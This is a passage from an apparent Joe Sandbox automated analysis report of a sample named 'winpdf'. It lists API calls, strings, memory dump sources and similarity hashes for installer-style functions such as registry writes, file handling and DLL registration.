                                                                                                                                                                • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                                                                                • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                                                                                  • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                                                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                • API String ID: 20674999-2124804629
                                                                                                                                                                • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                                                                                • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                                                                                APIs
                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                                                                                • GetSysColor.USER32(?), ref: 004041AF
                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                                                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                                                                                  • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                                                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                • String ID: @%F$N$`7:v$open
                                                                                                                                                                • API String ID: 3928313111-592333793
                                                                                                                                                                • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                                                                                • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                                                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                                                                                • wsprintfA.USER32 ref: 00406B4D
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                                                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                • String ID: F$%s=%s$NUL$[Rename]
                                                                                                                                                                • API String ID: 565278875-1653569448
                                                                                                                                                                • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                                                                                • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                                                                                • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                                                                                • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                                                                                APIs
                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                • String ID: F
                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                                                                                • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                                                                                APIs
                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                Strings
                                                                                                                                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                • API String ID: 1641139501-220328614
                                                                                                                                                                • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                                                                                • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                Strings
                                                                                                                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                • API String ID: 3294113728-3145124454
                                                                                                                                                                • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                                                                                • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                                                                                APIs
                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                                                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                                                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                • API String ID: 3734993849-2769509956
                                                                                                                                                                • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                                                                                • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                                                                                • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                Strings
                                                                                                                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
